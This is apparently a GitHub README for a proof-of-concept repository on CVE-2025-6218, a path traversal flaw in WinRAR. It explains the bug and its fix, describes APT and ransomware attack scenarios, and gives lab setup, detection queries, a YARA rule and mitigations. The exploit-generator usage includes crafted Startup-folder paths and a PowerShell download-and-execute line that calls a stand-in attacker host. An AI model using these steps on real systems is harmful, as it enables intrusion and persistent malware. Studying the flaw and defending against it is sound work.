
Análise abrangente e prova de conceito para CVE-2025-6218 - vulnerabilidade de path traversal RCE no WinRAR afetando versões 7.11 e anteriores
⚠️ VULNERABILIDADE CRÍTICA - Exploração Ativa Confirmada
CVE-2025-6218 é uma vulnerabilidade crítica de path traversal no WinRAR que permite a execução de código arbitrário. Atualmente explorada por grupos APT como GOFFEE, Bitter (APT-C-08) e Gamaredon.
CVE-2025-6218 é uma vulnerabilidade CRÍTICA de path traversal no WinRAR para Windows que permite que atacantes executem código arbitrário.
Um atacante pode:
O WinRAR não valida corretamente os caminhos dos arquivos dentro de arquivos .rar especializados. Quando um usuário extrai um arquivo malformado, os arquivos podem ser escritos em caminhos arbitrários fora da pasta de extração pretendida usando sequências de path traversal (../ ou ..\\).
// Pseudocodice - WinRAR v7.11 (VULNERABILE) void extract_file(rar_entry *entry, char *dest_dir) { char final_path[MAX_PATH];
strcpy(final_path, dest_dir); // "C:\\Temp\\"
strcat(final_path, entry->filename); // + "..\\..\\..\\Windows\\System32\\malware.exe"
// ❌ ERRORE: Nessuna validazione del path traversal!
// final_path = "C:\\Temp\\..\\..\\..\\Windows\\System32\\malware.exe"
// Risolto come: "C:\\Windows\\System32\\malware.exe" ← EXPLOIT!
create_file(final_path); // File creato in directory non intesa
}
### Proteções Ausentes na v7.11
- ❌ Nenhum controle se o arquivo permanece dentro de `dest_dir`
- ❌ Nenhum filtro para sequências `..` ou `.`
- ❌ Nenhuma normalização de caminhos
- ❌ Nenhuma whitelist de diretórios permitidos
- ❌ Nenhuma validação de contenção
### A Correção na v7.12```c
// WinRAR v7.12 (PATCHED)
bool is_path_contained(char *path, char *base_dir) {
char canonical[MAX_PATH], canonical_base[MAX_PATH];
// Normalizza entrambi i percorsi
GetFullPathName(path, MAX_PATH, canonical, NULL);
GetFullPathName(base_dir, MAX_PATH, canonical_base, NULL);
// Verifica contenimento
if (strncmp(canonical, canonical_base, strlen(canonical_base)) != 0) {
return false; // Path esce dalla directory base
}
return true;
}
void extract_file_safe(rar_entry *entry, char *dest_dir) {
char final_path[MAX_PATH];
strcpy(final_path, dest_dir);
strcat(final_path, entry->filename);
// ✅ FIX: Verifica che il file rimane dentro dest_dir
if (!is_path_contained(final_path, dest_dir)) {
skip_extraction(); // Rifiuta estrazione
log_error("Path traversal detected!");
return;
}
create_file(final_path); // Adesso sicuro
}
Cartella di Estrazione: C:\Temp\Extract
Path nel RAR (craft): ..\..\..\..\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
Risoluzione Path: C:\Temp\Extract\.. = C:\Temp\ C:\Temp\.. = C:\ C:\.. = C:\ (non può andare oltre)
= C:\Users\\AppData\Roaming\...\Startup\payload.bat ✓
### Diagrama de Fluxo de Ataque```
┌─────────────────────────────────────────────┐
│ 1. Attaccante crea RAR con path craft │
│ es: ..\\..\\..\\Startup\\malware.bat │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 2. Distribuzione via spear-phishing │
│ Email mirata con allegato RAR │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 3. Vittima estrae archivio con WinRAR │
│ (versione ≤ 7.11) │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 4. WinRAR non valida path traversal │
│ File estratto in Startup folder │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 5. Al boot: payload eseguito │
│ RAT stabilisce C2 connection │
└─────────────────────────────────────────────┘
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
wmic datafile where name="C:\\Program Files\\WinRAR\\WinRAR.exe" get Version
---
## 🌍 Cenários de Ataque
### Cenário 1: Bitter/APT-C-08 Spear-Phishing (CONFIRMADO ATIVO)
**Objetivo**: Governo, organizações militares, instituições estratégicas```
Email Phishing:
From: [email protected]
Subject: "Provision of Information for Sectoral for AJK.rar"
Attachment: Provision_of_Information.rar
Contenuto Archive:
├── Document.docx (esca legittima - report convincente)
└── ..\\..\\..\\..\\Users\\User\\AppData\\Roaming\\Microsoft\\Office\\STARTUP\\Template.dotm
(macro malato nascosto)
Esecuzione:
1. Vittima estrae RAR
2. WinRAR non valida path → Template.dotm finisce in Office STARTUP
3. Prossimo avvio Word → Macro eseguita automaticamente
4. PowerShell downloader attivato
5. C# Trojan scaricato: WmRAT, MiyaRAT, ZxxZ
6. C2 Server: johnfashionaccess.com
7. Capabilities:
- Keylogging
- Screenshot capture
- RDP credential stealing
- File exfiltration
- Lateral movement
Objetivo: Organizações governamentais russas``` RAR specializzato: ├── run.bat (path: ..\..\..\..\Windows\Startup\run.bat) └── legitimate_document.pdf (esca)
Attack Chain:
### Cenário 3: Entrega de Ransomware```
RAR Weaponized:
└── locker.exe (path: ..\\..\\..\\Startup\\locker.exe)
Infezione:
1. Estrazione RAR
2. locker.exe → Startup folder
3. Sistema reboota (naturale o forzato)
4. locker.exe eseguito con diritti user
5. File system encryption
6. Ransom note displayed
7. Bitcoin payment richiesto
✅ Windows VM (10, 11, Server) ✅ WinRAR versione ≤ 7.11 installato ✅ Network isolato (no internet - safety first!) ✅ Snapshot VM per rollback ✅ Admin access per testing
### Configuração do Ambiente Lab```powershell
# 1. Crea VM Windows pulita
# 2. Installa WinRAR 7.11
winget install RARLab.WinRAR --version 7.11
# 3. Verifica versione
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Output: 7.11.0.0 ✓
# 4. Disabilita network
Set-NetAdapter -Name "Ethernet" -Enabled $false
# 5. Crea snapshot
# VM → Snapshot → "Clean WinRAR 7.11 Vulnerable"
git clone https://github.com/Chrxstxqn/CVE-2025-6218-WinRAR-RCE-POC.git cd CVE-2025-6218-WinRAR-RCE-POC
python3 exploit/generate_rar.py
--target startup
--payload calc.exe
--output exploit_poc.zip
ls "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
shutdown /r /t 0
### Uso do Exploit Generator```bash
# Genera payload per Startup folder
python3 exploit/generate_rar.py --target startup --payload shell.bat
# Genera payload per System32 (richiede admin)
python3 exploit/generate_rar.py --target system32 --payload malware.exe
# Genera con custom batch command
python3 exploit/generate_rar.py \
--target startup \
--payload dropper.bat \
--batch "powershell -NoProfile -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# Targets disponibili:
# - startup : Auto-execution at login
# - system32 : System directory (needs admin)
# - appdata : User AppData
# - documents : User Documents
# - temp : User Temp folder
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Recurse -File | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
Get-ChildItem "$env:APPDATA\Microsoft\Office" -Include ".dotm",".xlsm" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
Get-WinEvent -LogName Security -FilterXPath "*[EventData[Data[@Name='ObjectName'] and contains(., 'System32')]]" -MaxEvents 100
### Execução de Processos```powershell
# Verifica processi in esecuzione da Startup
Get-WmiObject Win32_Process | Where-Object {
$_.ExecutablePath -like "*Startup*"
} | Select-Object Name, ExecutablePath, ProcessId
# Monitor WinRAR extraction con Sysmon (Event ID 11: File Created)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[EventID=11]] and *[EventData[Data[@Name='Image'] and contains(., 'WinRAR')]]" -MaxEvents 50
johnfashionaccess.com (Bitter/APT-C-08) [additional IOCs from CISA KEV]
### Indicadores de Email```
Subject patterns:
- "Provision of Information"
- "Sectoral for AJK"
- Government-related keywords
Senders:
- [email protected]
- Free email providers (Gmail, Outlook)
Attachments:
- .RAR files da external senders
- Legitimate-looking document names
rule CVE_2025_6218_WinRAR_PathTraversal { meta: description = "Detect RAR archives with path traversal sequences" author = "Christian Schito" date = "2025-12-15" cve = "CVE-2025-6218"
strings:
$rar_sig = { 52 61 72 21 } // "Rar!" signature
$traversal1 = "..\\" ascii wide
$traversal2 = "../" ascii wide
$startup = "Startup" ascii wide nocase
$system32 = "System32" ascii wide nocase
condition:
$rar_sig at 0 and
(#traversal1 > 3 or #traversal2 > 3) and
($startup or $system32)
}
## 🛡️ Mitigações
### 🔴 PATCH IMEDIATA (CRÍTICO)```powershell
# Verifica versione attuale
$version = (Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
if ($version -le "7.11.0.0") {
Write-Host "🔴 VULNERABILE! Update richiesto!" -ForegroundColor Red
} else {
Write-Host "🟢 SAFE - Versione $version patched" -ForegroundColor Green
}
# Download WinRAR 7.12+
# https://www.rarlab.com/rar_add.htm
# Deploy aziendale (SCCM/Intune)
msiexec /i WinRAR-x64-721.msi /quiet /norestart
# Verifica post-update
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Dovrebbe essere ≥ 7.12.0.0
✅ Blocca .RAR da external domains ✅ Quarantine archives per deep scanning ✅ Content disarm and reconstruction (CDR) ✅ Sandboxing di allegati sospetti ✅ YARA rules per detection
#### Proteção de Endpoint```powershell
# Scheduled task per monitoring
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-File C:\Scripts\monitor_startup.ps1'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 5)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "CVE-2025-6218 Monitor" -Description "Monitor Startup folder for suspicious files"
# Sysmon configuration
# Monitor Event ID 11 (File Created) in sensitive directories
✅ Separate admin workstations ✅ Block egress to known C2 domains ✅ Monitor for suspicious DNS queries ✅ Implement zero-trust network access
#### Lista de permissões de aplicativos```powershell
# AppLocker policy - Block execution from APPDATA\Startup
$rule = New-AppLockerPolicy -RuleType Path -Path "$env:APPDATA\*\Startup\*" -Action Deny -User Everyone
Set-AppLockerPolicy -PolicyObject $rule
✅ Non aprire archivi da email unknown ✅ Verify sender identity prima di aprire attachments ✅ Report suspicious emails al security team ✅ Keep software up-to-date ✅ Use sandboxed environment per file sospetti
---
## 📅 Linha do Tempo
| Data | Evento |
|------|--------|
| **Desconhecido** | Vulnerabilidade descoberta |
| **Junho 2025** | RARLAB lança WinRAR 7.12 com patch |
| **Julho 2025** | GOFFEE (Paper Werewolf) inicia exploração ativa |
| **Agosto 2025** | BI.ZONE publica análise técnica detalhada |
| **Setembro 2025** | Bitter/APT-C-08 confirmado em campanhas de spear-phishing |
| **Novembro 2025** | Gamaredon exploração confirmada contra Ucrânia |
| **9 Dezembro 2025** | 🔴 **CISA adiciona CVE-2025-6218 ao catálogo KEV** |
| **30 Dezembro 2025** | Prazo de patch obrigatório para agências federais dos EUA |
---
## 📁 Estrutura do Repositório```
CVE-2025-6218-WinRAR-RCE-POC/
├── README.md # Questa guida completa
├── LICENSE # MIT License
├── docs/
│ ├── TECHNICAL_ANALYSIS.md # Deep dive tecnico
│ ├── DETECTION.md # Forensics & IOC
│ ├── IOC_INDICATORS.md # Indicators of Compromise
│ └── SETUP.md # Lab setup guide
├── exploit/
│ ├── generate_rar.py # POC exploit generator (Python)
│ ├── CVE-2025-6218.bat # Batch script POC
│ └── README.md # Exploit usage guide
├── tools/
│ ├── detect.ps1 # Detection PowerShell script
│ ├── check_version.ps1 # Version checker
│ └── monitor_startup.ps1 # Startup folder monitor
└── samples/
├── yara_rules.yar # YARA detection rules
└── sysmon_config.xml # Sysmon configuration
⚠️ USO EXCLUSIVAMENTE EDUCACIONAL E DE PESQUISA
Este repositório é fornecido apenas para fins educacionais e de pesquisa de segurança autorizada.
L'autore NON è responsabile per:
Usando questo repository, accetti di:
**Acesso não autorizado a sistemas de computador é ilegal. Você foi avisado.**
---
## 📄 Licença
Licença MIT - Veja [LICENSE](https://github.com/chrxstxqn/cve-2025-6218-winrar-rce-poc/blob/HEAD/LICENSE) para detalhes
---
## 🤝 Contribuições
Contribuições bem-vindas! Se você tem:
- 🐛 Relatórios de bugs
- 💡 Solicitações de funcionalidades
- 📝 Melhorias na documentação
- 🔬 IOCs adicionais
Abra uma **Issue** ou **Pull Request**!
---
## 📞 Contato
**Autor**: Christian Schito
**GitHub**: [@Chrxstxqn](https://github.com/Chrxstxqn)
**Última atualização**: 15 de dezembro de 2025
**Status**: 🔴 Pesquisa Ativa - Exploração Confirmada
---
<div align="center">
**⭐ Se este repositório for útil para você, deixe uma estrela! ⭐**
**🔒 Fique Seguro. Atualize Agora. 🔒**
</div>
| Aspecto | Detalhe |
|---|
| CVSS Score | 7.8 (High) |
| Versões Vulneráveis | WinRAR ≤ 7.11 (Windows only) |
| Plataformas | Windows 10, 11, Server |
| Usuários Afetados | ~500 milhões |
| Corrigido Em | WinRAR 7.12 (Junho 2025) |
| Status | 🔴 Exploração ATIVA |
| CISA KEV | Adicionado em 9 de Dezembro de 2025 |
| Versão | Estado | Notas |
|---|
| ≤ 7.10 | 🔴 VULNERÁVEL | Todos os exploits funcionam |
| 7.11 | 🔴 VULNERÁVEL | Última versão vulnerável |
| 7.12 Beta 1+ | 🟢 CORRIGIDO | Correção de path traversal |
| 7.12+ | 🟢 CORRIGIDO | Versão estável com correção |
| UNIX / Android | ✅ NÃO AFETADO | Versões não-Windows não afetadas |